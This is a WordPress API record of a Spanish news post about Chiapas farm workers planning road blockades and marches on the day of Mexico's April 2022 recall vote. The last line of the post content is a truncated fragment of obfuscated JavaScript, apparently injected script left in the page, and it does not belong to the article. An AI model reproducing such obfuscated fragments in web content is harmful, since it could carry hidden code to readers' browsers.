{"id":836,"date":"2022-03-24T00:34:11","date_gmt":"2022-03-24T00:34:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=836"},"modified":"2022-03-24T00:34:13","modified_gmt":"2022-03-24T00:34:13","slug":"campesinos-de-chiapas-se-movilizaran-el-dia-de-la-consulta-nacional","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=836","title":{"rendered":"Campesinos de Chiapas se movilizar\u00e1n el D\u00eda de la Consulta Nacional"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"599\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220323-WA0008.jpg\" alt=\"\" class=\"wp-image-837\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220323-WA0008.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220323-WA0008-300x187.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220323-WA0008-768x479.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 23 de marzo del 2022. Tuxtla Guti\u00e9rrez.- Integrantes de la Uni\u00f3n Nacional de Trabajadores Agr\u00edcolas (UNTA) informaron que realizar\u00e1n una serie de movilizaciones el pr\u00f3ximo 10 de abril, fecha en que se llevar\u00e1 a cabo la consulta popular para la revocaci\u00f3n de mandato.<\/p>\n\n\n\n<p>Ezequiel Montoya Jim\u00e9nez, dirigente de la organizaci\u00f3n en Las Rosas, expuso que 36 comunidades de dicho municipio se unir\u00e1n a estas protestas.<\/p>\n\n\n\n<p>\u201cQuiero mencionarles que, para el d\u00eda 10 de abril, vamos a conmemorar un aniversario luctuoso del general Emiliano Zapata Salazar, en el cual vamos a hacer un movimiento a nivel estado, y queremos que todos demostremos nuestro m\u00fasculo, nuestra unidad, porque todo se puede\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Las exigencias son atenci\u00f3n al campo, que en las \u00faltimas administraciones han permanecido en el abandono por parte del Gobierno Federal. Por ello, lamentaron que, para este ejercicio el gobierno federal destine m\u00e1s de mil 500 millones, que bien podr\u00edan invertirse en el campo.<\/p>\n\n\n\n<p>En el marco del 103 aniversario luctuoso del caudillo del sur, se realizar\u00e1n marchas, bloqueos carreteros y dem\u00e1s movilizaciones en distintas regiones de esta entidad sure\u00f1a.<\/p>\n\n\n\n<p>\u201cCon estos bloqueos carreteros exigiremos los pendientes en el campo, por parte de las autoridades, en tanto, los bloqueos podr\u00edan afectar al desplazamiento de la poblaci\u00f3n en cabeceras municipales para que acudan a las urnas que se establecer\u00e1n para la Revocaci\u00f3n de Mandato\u201d, remarc\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 23 de marzo del 2022. Tuxtla Guti\u00e9rrez.- Integrantes de la Uni\u00f3n Nacional de Trabajadores Agr\u00edcolas (UNTA) informaron que realizar\u00e1n una serie de movilizaciones el pr\u00f3ximo 10 de abril, fecha en que se llevar\u00e1 a cabo la consulta popular para la revocaci\u00f3n de mandato. Ezequiel Montoya Jim\u00e9nez, dirigente de la organizaci\u00f3n en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":837,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-836","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/836","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=836"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/836\/revisions"}],"predecessor-version":[{"id":838,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/836\/revisions\/838"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/837"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=836"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=836"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=836"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}